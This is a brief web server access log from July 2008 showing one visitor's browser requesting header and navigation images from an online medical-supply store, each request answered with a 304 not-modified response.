83.132.78.146 - - [28/Jul/2008:04:55:18 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:04:55:18 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:04:55:18 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:04:55:20 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:04:55:20 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
83.132.78.146 - - [28/Jul/2008:04:55:20 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
